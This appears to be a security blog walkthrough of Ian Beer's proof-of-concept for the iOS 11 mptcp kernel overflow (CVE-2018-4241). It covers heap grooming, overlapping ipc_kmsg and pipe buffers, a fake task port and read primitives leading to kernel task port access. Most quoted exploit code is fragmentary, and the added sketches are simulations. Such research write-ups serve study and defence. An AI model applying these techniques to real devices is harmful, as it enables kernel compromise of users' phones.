Introduction
The iOS 11 mptcp bug (CVE-2018-4241), discovered by Ian Beer, is a serious kernel vulnerability: a buffer overflow in mptcp_usr_connectx that allows attackers to execute arbitrary code in a privileged context.
Ian Beer attached an interesting piece of PoC code that demonstrates a rather elegant technique for obtaining the kernel task port with this vulnerability. Expanding on the brief writeup that comes with the PoC, this blog post walks through the PoC in detail and covers the background it relies on. If you are an iOS security researcher who hasn’t looked into the PoC source code yet, hopefully you will find this material handy when you decide to do so.
Please have a copy of the mptcp PoC code at hand before we dive in! You can download it from here: Download
Note: All credits for exploitation techniques, vulnerability PoC code and original writeup belong to Ian Beer at Google Project Zero.
The Vulnerability
Let’s first take a quick look at the offending code in mptcp_usr_connectx(), which is the handler for the connectx syscall for the AF_MULTIPATH socket family:
if (src) {
The code does not validate the sa_len field if src->sa_family is neither AF_INET nor AF_INET6, so the function falls straight through to memcpy with a user-specified sa_len value of up to 255 bytes.
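To make the missing check concrete, here is a minimal user-space sketch of the flawed pattern. It is not the XNU code: every `SKETCH_` constant, the 28-byte destination size, and both function names are assumptions made for illustration, and the copy goes into a deliberately oversized arena so the spill can be observed safely.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Illustrative constants; the values are assumptions chosen to look Darwin-like. */
enum {
    SKETCH_AF_INET     = 2,
    SKETCH_AF_INET6    = 30,
    SKETCH_SIZEOF_SIN  = 16,  /* stands in for sizeof(struct sockaddr_in)  */
    SKETCH_SIZEOF_SIN6 = 28,  /* stands in for sizeof(struct sockaddr_in6) */
    SKETCH_DST_SIZE    = 28,  /* room reserved for the stored source address */
    SKETCH_MAX_SA_LEN  = 255  /* sa_len is a single byte */
};

/* The flawed pattern: only the two known families get a length check. */
static bool flawed_check_accepts(uint8_t sa_family, uint8_t sa_len) {
    if (sa_family == SKETCH_AF_INET && sa_len != SKETCH_SIZEOF_SIN)
        return false;
    if (sa_family == SKETCH_AF_INET6 && sa_len != SKETCH_SIZEOF_SIN6)
        return false;
    return true; /* every other family falls through to the copy */
}

/* Simulated copy. The destination is the first SKETCH_DST_SIZE bytes of a
 * larger arena, so the spill is observable without real memory corruption.
 * Returns how many bytes landed beyond the destination. */
static size_t copy_source_address(uint8_t *arena, size_t arena_size,
                                  const uint8_t *src, uint8_t sa_len) {
    assert(arena_size >= SKETCH_MAX_SA_LEN);
    memcpy(arena, src, sa_len);
    return sa_len > SKETCH_DST_SIZE ? (size_t)sa_len - SKETCH_DST_SIZE : 0;
}
```

With these assumed sizes, an address of any other family with sa_len set to 255 passes the check and writes 227 bytes past the destination.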
Background
Kernel zone heap allocator
To oversimplify a bit, kernel heap memory is divided into zones, and within one zone all allocations are the same size. For each zone, the kernel keeps four doubly-linked lists that categorize pages by how much free memory they have, namely:
struct {
When a memory allocation is requested, the intermediate page list is traversed before the all_free list, and a free memory block is returned from the first available page.
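The ordering matters for the rest of the exploit, so here is a toy model of it. This is only a sketch under simplifying assumptions: a zone is reduced to three pages with two slots each, and `toy_zone`, `toy_zalloc` and `toy_zfree` are hypothetical names, not kernel APIs.

```c
#include <assert.h>
#include <stddef.h>

/* Toy model of one zone: each page holds a fixed number of equal-size slots. */
enum { SLOTS_PER_PAGE = 2, PAGE_COUNT = 3 };

typedef struct {
    int used[PAGE_COUNT]; /* slots currently in use on each page */
} toy_zone;

/* A page counts as "intermediate" when it is partly used. */
static int is_intermediate(const toy_zone *z, int page) {
    return z->used[page] > 0 && z->used[page] < SLOTS_PER_PAGE;
}

/* Allocate one slot; returns the page it came from, or -1 if the zone is full. */
static int toy_zalloc(toy_zone *z) {
    for (int p = 0; p < PAGE_COUNT; p++)   /* first pass: intermediate pages */
        if (is_intermediate(z, p)) { z->used[p]++; return p; }
    for (int p = 0; p < PAGE_COUNT; p++)   /* second pass: completely free pages */
        if (z->used[p] == 0) { z->used[p]++; return p; }
    return -1;
}

/* Free one slot on the given page. */
static void toy_zfree(toy_zone *z, int page) {
    assert(page >= 0 && page < PAGE_COUNT && z->used[page] > 0);
    z->used[page]--;
}
```

In this model, freeing a single slot on a full page turns that page into an intermediate one, so the very next allocation of the same size lands back in the hole we just made, even if an entirely empty page is available.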
Preallocated ipc_kmsg buffer
ipc_port has a struct ipc_kmsg *premsg member that points to an optional preallocated ipc_kmsg buffer. The intended use case is to allow user space to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message, it first checks whether the port has one of these preallocated buffers and, provided the buffer is not already in use, uses it instead of allocating a new one. In addition, this kernel heap buffer is not freed after the message is delivered to user space. Ian Beer uses this fact to increase the stability of the exploit.
Mach exception port
Mach provides an IPC-based exception-handling facility in which exceptions are converted to messages. A thread or task can register one or more mach ports as so-called “exception ports” to receive information about an exception. When an exception occurs, a message describing it is sent to the exception port. Combined with a mach port that has a preallocated ipc_kmsg buffer, this lets us force the kernel to write data to a deterministic location in the heap. Furthermore, we can partially control the content of the message by manipulating the register state at the time of the exception, which the kernel dutifully carries over into the message.
For more information about preallocated messages and the exception-handling mechanism, readers are advised to check out Ian Beer’s excellent writeup on the iOS 10 extra-recipe bug here, as well as Chapter 9.7 of Amit Singh’s seminal Mac OS X Internals.
Ok, let’s now dig in!
Finding the target
By passing in a src with an unexpected sa_family, we are now able to overflow inside mpte, an mptses structure, with sa_len bytes of attacker-controlled data. Here is the struct declaration in /bsd/netinet/mptcp_var.h:
struct mptses {
Here, mpte_itfinfo is particularly interesting because it’s a pointer… keep digging through the references to mpte_itfinfo… oh snap!
if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE)
In mptcp_session_destroy, the address held in mpte_itfinfo is freed whenever mpte_itfinfo_size exceeds MPTE_ITFINFO_SIZE, and mpte_itfinfo_size is under our complete control too! Moreover, we don’t need to know a priori the size of the object we would like to _FREE, because kfree_addr() will look up the size from the memory zone struct in which the object resides. (_FREE is just a macro around kfree_addr().)
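A tiny model of that destroy path shows why controlling both fields is enough. This is a sketch, not the kernel code: `sketch_session` and both functions are hypothetical, the threshold value 4 is an assumption standing in for MPTE_ITFINFO_SIZE, and addresses are plain integers so nothing is actually freed.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { SKETCH_ITFINFO_INLINE = 4 }; /* stand-in for MPTE_ITFINFO_SIZE; value assumed */

typedef struct {
    uint64_t itfinfo;      /* models the value of the mpte_itfinfo pointer */
    uint32_t itfinfo_size; /* models mpte_itfinfo_size */
} sketch_session;

/* Models the effect of the overflow: both fields become attacker-chosen. */
static void overflow_session(sketch_session *s, uint64_t ptr, uint32_t size) {
    assert(s != NULL);
    s->itfinfo = ptr;
    s->itfinfo_size = size;
}

/* Returns the address the destroy path would hand to _FREE, or 0 for none. */
static uint64_t address_freed_on_destroy(const sketch_session *s) {
    if (s->itfinfo_size > SKETCH_ITFINFO_INLINE)
        return s->itfinfo;
    return 0;
}
```

An untouched session with a small size frees nothing extra, while a corrupted one frees whatever address the overflow left in the pointer.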
This is just too good to be true.
Set up the heap
To turn this overflow into something actually useful, it’s time for some heap Feng Shui. The end goal here is to have an ipc_kmsg and a pipe buffer overlapping each other so that we can write to and read from it. In the PoC, Ian Beer chooses to overwrite the lower 3 bytes of mpte_itfinfo with 0x000000, after which it points to a 16MB-aligned address.
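The arithmetic behind the 16MB figure is short enough to spell out. The sketch below assumes a little-endian machine, where the first bytes a linear overflow reaches are the least significant ones; the function names and the sample pointer value are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Zero the n least significant bytes of a stored pointer, which is what a
 * linear overflow of n zero bytes does to it on a little-endian machine. */
static uint64_t zero_low_bytes(uint64_t ptr, unsigned n_bytes) {
    assert(n_bytes <= sizeof ptr);
    uint64_t mask = (n_bytes == 8) ? 0 : ~((UINT64_C(1) << (8 * n_bytes)) - 1);
    return ptr & mask;
}

/* Alignment implied by clearing n low bytes: 2^(8n) bytes. */
static uint64_t alignment_after_zeroing(unsigned n_bytes) {
    assert(n_bytes < 8);
    return UINT64_C(1) << (8 * n_bytes);
}
```

For three bytes, the alignment is 2^24 = 16,777,216 bytes, i.e. 16MB, and a hypothetical pointer such as 0xffffffe012345678 becomes 0xffffffe012000000.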
In order to have an ipc_kmsg sitting right at that 16MB boundary, the code alternately allocates 16MB of ipc_kmsgs and a bunch of mptcp sockets in the kernel heap. The former is done by allocating fake mach ports and sending mach messages of a calculated size to them, during which mach_msg(...MACH_SEND_MSG...) allocates a kernel heap buffer for us and copies in the message from user space. This technique effectively lets us call kalloc from outside the kernel. We are also able to control the memory zone for the ipc_kmsg: all it takes is to work backward and calculate the msgh_size from the kalloc size we would like to achieve. In the PoC, Ian Beer chooses to place the ipc_kmsgs in the kalloc.2048 zone.
// a few times do:
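A minimal sketch of the backward size calculation mentioned above, assuming the kernel buffer ends up roughly 4/3 the size of the user message plus a fixed overhead. Both the 3/4 factor and the 0x74 constant are assumptions tied to particular kernel builds, so treat them as placeholders rather than facts about every XNU version.

```c
#include <assert.h>

/* Given the kalloc size we want the kernel to use for the ipc_kmsg, return
 * the user-space message size to send.
 * ASSUMPTION: kernel buffer ~= 4/3 * message size + fixed overhead. */
static int message_size_for_kalloc_size(int kalloc_size) {
    assert(kalloc_size >= 256); /* keep the result positive */
    return ((3 * kalloc_size) / 4) - 0x74;
}
```

Under these assumed constants, targeting a 2048-byte allocation means sending a 1420-byte message.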
Trigger the bug
The code in do_partial_kfree_with_socket triggers the bug, overwriting the lower 3 bytes of mpte_itfinfo with NUL bytes. With luck, the pointer now lands on one of our ipc_kmsg buffers at the 16MB boundary. Fingers crossed! 🤞
void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes) {
After we point mpte_itfinfo to the 16MB boundary, we can trigger the _FREE simply by closing the socket.
One caveat is that we need to wait for mptcp_gc, because mpte_itfinfo is not _FREE’d immediately after the socket is closed, as is evident from the comment on this function in /xnu-4570.41.2/bsd/netinet/mptcp_subr.c:
/*
After the _FREE, one of the ipc_kmsg buffers has hopefully been freed and its page put on the intermediate list.
Allocate pipes
Next, we allocate a bunch of pipes and write 2047 bytes of data to the write end of each. The backing buffers for these pipes will come from kalloc.2048, hopefully including our 16MB-aligned address.
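From user space this step is plain POSIX. Here is a minimal sketch of creating one such pipe; `make_filled_pipe` and `SKETCH_FILL_SIZE` are hypothetical names, and using 'B' as the fill byte is an assumption taken from the comparison step later in this post.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>

enum { SKETCH_FILL_SIZE = 2047 };

/* Create a pipe and write `size` bytes of 'B' into it.
 * Returns 0 on success and -1 on failure; fds[0] is the read end. */
static int make_filled_pipe(int fds[2], size_t size) {
    unsigned char fill[SKETCH_FILL_SIZE];
    assert(size <= sizeof fill);
    memset(fill, 'B', sizeof fill);
    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], fill, size) != (ssize_t)size) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    return 0;
}
```

Calling this in a loop a few hundred times, and keeping every descriptor open, leaves that many pipe buffers resident in the kernel until we read them back.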
Trigger the bug again
We trigger the bug a second time to _FREE the underlying pipe buffer, which puts the page on the intermediate page list again.
[Figures: heap layout after the overflow, and after the _FREE]
Allocate more mach ports!
Next, we allocate a bunch of mach ports with preallocated ipc_kmsg buffers from the kalloc.2048 zone using mach_port_allocate_full(), passing in the size as a member of the mach_port_qos_t parameter. The desired size for the preallocated buffer is 2048 bytes, which places it in the kalloc.2048 zone. Hopefully one of them picks up the space we just _FREE’d.
We then insert a send right for every mach port we allocated in this step, as each one will later be registered as another thread’s exception port.
Catching the pipe
Ideally, we now have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write) overlapping each other.
We now need to find out which one of the hundreds of pipes we allocated a while ago is on that spot.
int find_replacer_pipe(void** contents) {
The technique Ian Beer uses here is simply to read from each pipe and compare what comes back with the data we originally wrote into the buffer, a run of B characters (byte value 0x42). If they differ, the underlying buffer has been overwritten by a newly allocated ipc_kmsg.
If we can’t find a pipe satisfying this condition, it simply means there is no overlap, and we just have to restart and wish ourselves better luck next time.
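The read-and-compare loop can be sketched with ordinary pipes. This is not the PoC’s find_replacer_pipe: the function name, its parameters and the 2047-byte size are assumptions, and writing the bytes straight back is a choice of this sketch so that each pipe keeps its contents after being inspected.

```c
#include <assert.h>
#include <stddef.h>
#include <unistd.h>

enum { SKETCH_PIPE_SIZE = 2047 };

/* Read each pipe's contents, put them straight back, and report the first
 * pipe whose bytes are no longer all `fill`. Returns its index, or -1 if no
 * pipe differs or an I/O call fails. On a match, `contents` holds the bytes
 * that were read from that pipe. */
static int find_changed_pipe(const int *read_ends, const int *write_ends,
                             int count, unsigned char fill,
                             unsigned char *contents) {
    assert(contents != NULL);
    for (int i = 0; i < count; i++) {
        if (read(read_ends[i], contents, SKETCH_PIPE_SIZE) != SKETCH_PIPE_SIZE)
            return -1;
        /* Write the bytes back so the pipe buffer stays populated. */
        if (write(write_ends[i], contents, SKETCH_PIPE_SIZE) != SKETCH_PIPE_SIZE)
            return -1;
        for (size_t j = 0; j < SKETCH_PIPE_SIZE; j++)
            if (contents[j] != fill)
                return i;
    }
    return -1;
}
```

In a normal process no pipe ever changes underneath us, so the only way to exercise this sketch outside the exploit is to fill one pipe with different data on purpose.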
Catching the port
Now, we need to figure out which port owns the preallocated ipc_kmsg buffer. To do that, we need to somehow persuade the kernel into overwriting the preallocated kmsg with something different, so that we can compare the content again and spot the difference.
Ian Beer’s technique in the PoC is to register each port as an exception port for a thread and intentionally raise an exception on that thread, causing the kernel to send a kmsg to the buffer, and then immediately compare the content by reading from the pipe. This is ingenious.
for (int i = 0; i < 100; i++) {
send_prealloc_msg(exception_ports[i]);
// read from the pipe and see if the contents changed:
Let’s walk through send_prealloc_msg() step by step.
1. Start a thread
pthread_create(&t, NULL, do_thread, (void*)port);
2. Register exception port
void* do_thread(void* arg) {
3. Substitute the thread port with the host port
// make the thread port which gets sent in the message actually be the host port
4. Crash the thread
// cause an exception message to be sent by the kernel
After the thread crashes, a message containing the exception information is sent to our ipc_kmsg buffer, waiting to be received and processed by the port. We can now read from the pipe and compare the content.
ssize_t amount = read(replacer_pipe, new_contents, PIPE_SIZE);
At this point, we have identified the overlapping (pipe, port) pair.
We also need to save the kernel address for the host port and our task port for later:
// We will get kernel ipc_space address from this later
Build fake task port
Before we receive the exception message into user space, we want to build a fake task port to enable an early arbitrary kernel read.
build_fake_task_port(original_contents+fake_port_offset, fake_port_kaddr, early_read_pipe_buffer_kaddr, 0, 0);
We can do this by mimicking the structure of a proper task port and shoving it into our ipc_kmsg buffer through our replacer_pipe.
// the thread port is at +66ch
We can read off the kernel address of our buffer from the next field, which points back to the buffer itself given that it is the only ipc_kmsg in the queue.
uint64_t pipe_buf = *((uint64_t*)(new_contents + 0x8));
Let’s zoom into our ipc_kmsg buffer to observe the change.
Now, the thread_port points to our fake task port! Mission accomplished!
Note: In this particular PoC, before our overwrite, *thread_port actually pointed to the host port, because in Step 3 of the previous section we substituted the thread port with the host port. This leaks the kernel address of the host port, which can be used to obtain the kernel’s ipc_space later. We will cover this shortly.
Receive the exception message
User space programs can receive the exception message by calling out to the system exception server, exc_server, after which the various port rights in the ipc_kmsg are inserted into the calling task’s ipc_space, including a send right to our fake task port (which is really supposed to be a thread port).
We can now simply extract the port name of the fake port from the thread argument of the exception handler callback:
kern_return_t catch_exception_raise_state_identity
At this point, we have successfully inserted a fake task port into our task’s ipc_space. Isn’t this ingenious?
Build early kernel read primitive
With the fake task port we can build an early kernel read primitive by using pid_for_task().
Given a valid task port, pid_for_task() simply gets a task pointer from the port’s ip_kobject, dereferences it to retrieve the proc pointer from the task’s bsd_info, then dereferences the proc struct to get the pid. Since all it does is pointer arithmetic and dereferencing, we can create a fake task struct inside the ipc_kmsg we control, work backward, and place the kernel address we would like to read at the correct offset.
uint8_t* fake_task = fake_port + 0x100;
With every call to early_rk32, we just need to rebuild the task port, pointing bsd_info at the address we want to read minus 0x10. Unsurprisingly, 0x10 is just the offset of the p_pid field inside struct proc, as is evident in proc_internal.h:
struct proc {
The drawback of this technique is that each read is limited to 32 bits, which is the size of a pid_t.
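To see why this works, it helps to model the pointer chain outside the kernel. In the sketch below a byte array stands in for kernel memory and addresses are offsets into it. Only the 0x10 offset of p_pid comes from the text above; the other two offsets, the array, and all function names are hypothetical. The 64-bit helper shows the usual workaround for the 32-bit limit, two adjacent reads glued together, and assumes a little-endian machine.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

enum {
    SKETCH_MEM_SIZE  = 0x400,
    SKETCH_PORT_KOBJ = 0x68, /* assumed offset of ip_kobject in the port     */
    SKETCH_TASK_BSD  = 0x20, /* hypothetical offset of bsd_info in the task  */
    SKETCH_PROC_PID  = 0x10  /* offset of p_pid in struct proc (from the text) */
};

static uint8_t sketch_mem[SKETCH_MEM_SIZE]; /* stand-in for kernel memory */

static uint64_t load64(uint64_t addr) {
    uint64_t v;
    assert(addr + sizeof v <= SKETCH_MEM_SIZE);
    memcpy(&v, sketch_mem + addr, sizeof v);
    return v;
}

static void store64(uint64_t addr, uint64_t v) {
    assert(addr + sizeof v <= SKETCH_MEM_SIZE);
    memcpy(sketch_mem + addr, &v, sizeof v);
}

/* Model of the chain pid_for_task() follows: port -> task -> proc -> pid. */
static uint32_t model_pid_for_task(uint64_t port) {
    uint64_t task = load64(port + SKETCH_PORT_KOBJ);
    uint64_t proc = load64(task + SKETCH_TASK_BSD);
    uint32_t pid;
    assert(proc + SKETCH_PROC_PID + sizeof pid <= SKETCH_MEM_SIZE);
    memcpy(&pid, sketch_mem + proc + SKETCH_PROC_PID, sizeof pid);
    return pid;
}

/* 32-bit read: aim bsd_info at (target - 0x10) so that "p_pid" aliases target. */
static uint32_t sketch_rk32(uint64_t fake_port, uint64_t fake_task,
                            uint64_t target) {
    assert(target >= SKETCH_PROC_PID);
    store64(fake_port + SKETCH_PORT_KOBJ, fake_task);
    store64(fake_task + SKETCH_TASK_BSD, target - SKETCH_PROC_PID);
    return model_pid_for_task(fake_port);
}

/* 64-bit read built from two adjacent 32-bit reads (little-endian order). */
static uint64_t sketch_rk64(uint64_t fake_port, uint64_t fake_task,
                            uint64_t target) {
    uint64_t lo = sketch_rk32(fake_port, fake_task, target);
    uint64_t hi = sketch_rk32(fake_port, fake_task, target + 4);
    return lo | (hi << 32);
}
```

With the fake port at offset 0 and the fake task at 0x100, reading a value stored at 0x300 returns its low half from `sketch_rk32` and the whole value from `sketch_rk64`.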
Build full kernel read/write primitive
Notice that the struct ipc_space *receiver field in our fake port and the address space description, vm_map_t map, in our fake task are still missing. We can achieve full kernel read/write by filling in the addresses of ipc_space_kernel and the kernel task’s vm_map.
We can get the kernel ipc_space from the host port we obtained a while ago, at a known offset:
// receiver field
However, the kernel’s vm_map is a bit trickier to get.
Ian Beer’s approach takes the following steps:
- Find the kernel task port on the heap
- Get the kernel’s task from the task port
- Get the vm_map from the kernel task
To find the kernel task port on the heap, we search in the vicinity of the host port for anything that looks like a task port and get the kernel task vm_map from it:
// now look through up to 0x4000 of ports and find one which looks like a task port:
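What “looks like a task port” means can be sketched as a check on the port’s io_bits, which combine an active flag with the kobject type. The sketch below models the neighbouring ports as an array instead of reading kernel memory; `sketch_port` and `find_task_object` are hypothetical, and the two constants mirror values from the XNU headers as an assumption you should verify against your kernel version.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define SKETCH_IO_BITS_ACTIVE 0x80000000u /* assumed: "object is alive" flag    */
#define SKETCH_IKOT_TASK      2u          /* assumed: kobject type of task ports */

typedef struct {
    uint32_t io_bits; /* flags plus kobject type */
    uint64_t kobject; /* models ip_kobject: the task the port refers to */
} sketch_port;

/* Scan `count` neighbouring ports and return the kobject of the first one
 * that is an active task port, or 0 if none qualifies. */
static uint64_t find_task_object(const sketch_port *ports, size_t count) {
    assert(ports != NULL);
    for (size_t i = 0; i < count; i++) {
        if (ports[i].io_bits != (SKETCH_IO_BITS_ACTIVE | SKETCH_IKOT_TASK))
            continue; /* wrong type, or not active */
        return ports[i].kobject;
    }
    return 0;
}
```

In the real exploit each of these field reads would go through the early 32-bit read primitive, and the task address found this way is where the vm_map is then read from.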
After inserting what we just found into our fake port and fake task, we finally have a fully functional, but “fake”, tfp0. Hooray!
Have fun now with your freshly baked tfp0!
Reference
- XNU kernel heap overflow due to bad bounds checking in MPTCP, Ian Beer
- Exception-based exploitation on iOS, Ian Beer
- CVE-2018-4241, Common Vulnerabilities and Exposures
- Mac OS X Internals - A System Approach, Amit Singh
- *OS Internals: Volume III Security & Insecurity, Jonathan Levin